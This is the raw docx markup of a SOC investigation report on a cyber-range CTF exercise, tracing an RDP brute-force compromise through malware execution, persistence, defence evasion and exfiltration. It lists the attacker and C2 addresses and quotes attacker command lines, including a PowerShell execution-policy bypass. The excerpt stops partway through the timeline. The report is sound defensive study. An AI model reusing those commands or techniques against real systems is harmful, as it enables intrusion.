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8566E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>SOC INVESTIGATION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF8A4BC" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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Hide Your RDP: Password Spray Leads to Full Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D493EB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Josh Madakor Cyber Range </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>CTF  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">  Incident Date: September 16, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143B6D20" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst: Kenneth </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Gates  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">  Date Completed: May 3, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D6146E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Platform: Microsoft Sentinel / Log Analytics Workspace (LAW-Cyber-Range)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDA9575" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65A466A5" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F02AA2B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A cloud-hosted Windows server (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slflarewinsysmo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) was compromised via RDP brute force originating from external IP 159.26.106.84. The attacker gained access using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slflare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account, deployed a malicious binary disguised as a Windows update utility, established persistence via a scheduled task, disabled Windows Defender, performed host reconnaissance, archived sensitive data, and exfiltrated it to a C2 server at 185.92.220.87 over port 8081. The attack spanned multiple stages consistent with an APT-style intrusion chain mapped entirely to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544738D8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B5C8EA9" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Incident Metadata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C1E8E" w14:paraId="7C47E0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BB38" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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144F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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C1E8E" w14:paraId="1662AC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6613" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Incident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D247" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>September 16, 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="6AAE48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D256" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Device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28A7" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>slflarewinsysmo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="64F0E7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EC62" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Compromised Account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38DB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>slflare</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="606B20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01F8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker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3CBE" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>159.26.106.84</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="10E143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5257" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2 Server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8656" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>185.92.220.87:8081</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="3A72A0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FA75" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tools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24FB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MDE Advanced Hunting, Microsoft Sentinel, KQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="7708FB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D261" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity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C7C1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="08F407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76A8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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C540" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Investigation Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14C7551B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E18B663" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Flags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8"/>
        <w:gridCol w:w="2297"/>
        <w:gridCol w:w="3177"/>
        <w:gridCol w:w="3298"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1E8E" w14:paraId="58530D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DC0A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D6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50EF" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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D0D8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MITRE Technique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B726" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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</w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="3B65E4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6CF1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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1EB5" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access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F8B1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1110.001 - Brute Force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9091" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>159.26.106.84</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="4C9FB6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4D7F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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D668" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access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2262" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1078 - Valid Accounts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D1D5" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>slflare</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="22EAA9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594B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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5528" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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C13D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1204.002 - Malicious File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159A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msupdate.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="2FFCA0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F7C0" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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3400" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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C722" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059 - Command Interpreter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22BD" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"msupdate.exe" -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ExecutionPolicy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Bypass -File C:\Users\Public\update_check.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="6728B2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C205" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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FDDB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence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6B56" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1053.005 - Scheduled Task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A599" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MicrosoftUpdateSync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="1D56A9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227B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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79C3" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Defense Evasion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06B4" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1562.001 - Impair Defenses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1191" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\Windows\Temp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="32ADB8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3F5D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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8A5F5" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Discovery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734E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1082 - System Information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663B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"cmd.exe" /c </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>systeminfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="451A71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BD7B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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0276" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Collection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161F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1560.001 - Local Archiving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9860" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>backup_sync.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="345F98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F887E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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06EB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2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213E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1071.001 - Web Protocols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0006" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>185.92.220.87</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="246F83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64EB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66"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7D5F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration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A09E" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1048.003 - Unencrypted Protocol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B805" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>185.92.220.87:8081</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65228C46" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="002C1E8E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796C5535" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Attack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160"/>
        <w:gridCol w:w="4800"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1E8E" w14:paraId="764E71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D527" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Timestamp (UTC)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1F98" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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EFAD" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66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</w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="5BCD9D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CCB4" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 18:35 PM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F752" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access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EE22" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Failed RDP logon attempts begin from 159.26.106.84 against </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>slflare</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="53F3B5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BD5B9" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 18:43 PM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1697" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access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6669" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Successful RDP logon - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>slflare</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> account compromised</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="7EE0A4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CD4F" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:38 PM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359A" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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2FFB" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msupdate.exe created in C:\Users\Public\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="003E79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4BF2" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:38 PM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30D8" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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B592" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msupdate.exe executed with -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ExecutionPolicy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Bypass -File update_check.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="29D913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3C8C" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:38 PM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B109" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution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76D1" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>update.ps1 and update_check.ps1 dropped to C:\Users\Public\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1E8E" w14:paraId="16C4B6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846B" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:39 PM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C301" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Persistence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D7CE" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled task </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MicrosoftUpdateSync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> created (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>BootTrigger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C1E8E" w14:paraId="59E877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37D5" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025-09-16 19:39 PM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913D" w14:textId="77777777" w:rsidR="002C1E8E" w:rsidRDefault="00C24D66">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
